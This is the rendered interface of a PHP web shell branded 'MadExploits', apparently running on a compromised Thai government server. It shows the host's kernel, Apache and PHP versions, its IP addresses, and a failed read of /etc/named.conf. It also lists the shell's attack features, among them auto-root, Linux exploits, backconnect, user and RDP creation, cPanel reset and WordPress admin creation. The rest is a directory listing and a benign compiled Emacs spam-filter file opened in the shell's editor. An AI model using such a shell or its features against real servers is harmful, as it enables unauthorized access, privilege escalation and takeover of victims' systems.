Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
9.01
KB
-rw-r--r--
blessmail.el
2.51
KB
-rw-r--r--
emacsbug.elc
7.55
KB
-rw-r--r--
feedmail.elc
79.59
KB
-rw-r--r--
footnote.elc
21.09
KB
-rw-r--r--
hashcash.elc
10.81
KB
-rw-r--r--
mail-extr.elc
33.9
KB
-rw-r--r--
mail-hist.elc
13.74
KB
-rw-r--r--
mail-utils.elc
9.55
KB
-rw-r--r--
mailabbrev.elc
13.96
KB
-rw-r--r--
mailalias.elc
13.52
KB
-rw-r--r--
mailclient.elc
3.56
KB
-rw-r--r--
mailheader.elc
5.92
KB
-rw-r--r--
mailpost.elc
2.3
KB
-rw-r--r--
metamail.elc
4.44
KB
-rw-r--r--
mspools.elc
7.25
KB
-rw-r--r--
reporter.elc
9.65
KB
-rw-r--r--
rfc2368.elc
2.46
KB
-rw-r--r--
rfc822.elc
5.71
KB
-rw-r--r--
rmail-spam-filter.elc
13.24
KB
-rw-r--r--
rmail.elc
113.93
KB
-rw-r--r--
rmailedit.elc
8.83
KB
-rw-r--r--
rmailkwd.elc
5.12
KB
-rw-r--r--
rmailmm.elc
11.05
KB
-rw-r--r--
rmailmsc.elc
1.56
KB
-rw-r--r--
rmailout.elc
15.73
KB
-rw-r--r--
rmailsort.elc
6.33
KB
-rw-r--r--
rmailsum.elc
52.51
KB
-rw-r--r--
sendmail.elc
51.72
KB
-rw-r--r--
smtpmail.elc
21.58
KB
-rw-r--r--
supercite.elc
58.99
KB
-rw-r--r--
uce.elc
7.66
KB
-rw-r--r--
undigest.elc
7.88
KB
-rw-r--r--
unrmail.elc
4.69
KB
-rw-r--r--
uudecode.elc
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rmail-spam-filter.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:22 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/mail/rmail-spam-filter.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`rmail-spam-filter.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\303\304\305\306\307\301%\207" [require rmail rmailsum custom-declare-group rmail-spam-filter nil "Spam filter for Rmail, the Emacs mail reader." :group] 6) #@113 Non-nil to activate the Rmail spam filter. Set `rsf-definitions-alist' to define what you consider spam emails. (custom-declare-variable 'rmail-use-spam-filter 'nil '(#$ . 826) :type 'boolean :group 'rmail-spam-filter) #@238 Name of Rmail file for optionally saving some of the spam. You can either just delete spam, or save it in this file for later review. Which action to take for each spam definition is specified by the "action" element of the definition. (custom-declare-variable 'rsf-file '"~/XRMAIL-SPAM" '(#$ . 1052) :type 'string :group 'rmail-spam-filter) #@57 Non-nil means mail with no explicit To: or Cc: is spam. (custom-declare-variable 'rsf-no-blind-cc 'nil '(#$ . 1401) :type 'boolean :group 'rmail-spam-filter) #@58 Non-nil means to ignore case in `rsf-definitions-alist'. (custom-declare-variable 'rsf-ignore-case 'nil '(#$ . 1565) :type 'boolean :group 'rmail-spam-filter) #@41 Non-nil means to beep if spam is found. (custom-declare-variable 'rsf-beep 'nil '(#$ . 1730) :type 'boolean :group 'rmail-spam-filter) #@65 Seconds to wait after displaying a message that spam was found. (custom-declare-variable 'rsf-sleep-after-message '2.0 '(#$ . 1871) :type 'number :group 'rmail-spam-filter) #@186 Minimum size of region that you can add to the spam list. The aim is to avoid adding too short a region, which could result in false positive identification of a valid message as spam. (custom-declare-variable 'rsf-min-region-to-spam-list '7 '(#$ . 2051) :type 'integer :group 'rmail-spam-filter) #@122 Non-nil to auto-save new spam entries. Any time you add an entry via the "Spam" menu, immediately saves the custom file. (custom-declare-variable 'rsf-autosave-newly-added-definitions 'nil '(#$ . 2355) :type 'boolean :group 'rmail-spam-filter) #@288 List of regexps to identify valid senders. If any element matches the "From" header, the message is flagged as a valid, non-spam message. E.g., if your domain is "emacs.com" then including "emacs\\.com" in this list would flag all mail (purporting to be) from your colleagues as valid. (custom-declare-variable 'rsf-white-list 'nil '(#$ . 2606) :type '(repeat string) :group 'rmail-spam-filter) #@726 A list of rules (definitions) matching spam messages. Each rule is an alist, with elements of the form (FIELD . REGEXP). The recognized FIELDS are: from, to, subject, content-type, x-spam-status, and contents. The "contents" element refers to the entire text of the message; all the other elements refer to message headers of the same name. Using an empty-string for REGEXP is the same as omitting that element altogether. Each rule should contain one "action" element, saying what to do if the rule is matched. This has the form (action . CHOICE), where CHOICE may be either `output-and-delete' (save to `rsf-file', then delete), or `delete-spam' (just delete). A rule matches only if all the specified elements match. (custom-declare-variable 'rsf-definitions-alist 'nil '(#$ . 3009) :type '(repeat (list :format "%v" (cons :format "%v" :value (from . #1="") (const :format #1# from) (string :tag "From" #1#)) (cons :format "%v" :value (to . #1#) (const :format #1# to) (string :tag "To" #1#)) (cons :format "%v" :value (subject . #1#) (const :format #1# subject) (string :tag "Subject" #1#)) (cons :format "%v" :value (content-type . #1#) (const :format #1# content-type) (string :tag "Content-Type" #1#)) (cons :format "%v" :value (contents . #1#) (const :format #1# contents) (string :tag "Contents" #1#)) (cons :format "%v" :value (x-spam-status . #1#) (const :format #1# x-spam-status) (string :tag "X-Spam-Status" #1#)) (cons :format "%v" :value (action . output-and-delete) (const :format #1# action) (choice :tag "Action selection" (const :tag "Output and delete" output-and-delete) (const :tag "Delete" delete-spam))))) :group 'rmail-spam-filter) #@50 Non-nil when `rmail-spam-filter' scans messages. (defvar rsf-scanning-messages-now nil (#$ . 4678)) #@594 Check if a message appears to be spam. FIELD-SYMBOL is one of the possible keys of a `rsf-definitions-alist' rule; e.g. from, to. MESSAGE-DATA is a string giving the value of FIELD-SYMBOL in the current message. DEFINITION is the element of `rsf-definitions-alist' currently being checked. RESULT is a cons of the form (MAYBE-SPAM . IS-SPAM). If the car is nil, or if the entry for FIELD-SYMBOL in this DEFINITION is absent or the empty string, this function does nothing. Otherwise, if MESSAGE-DATA is non-nil and the entry matches it, the cdr is set to t. Else, the car is set to nil. (defalias 'rsf-check-field #[(field-symbol message-data definition result) "\305 \"A@\205&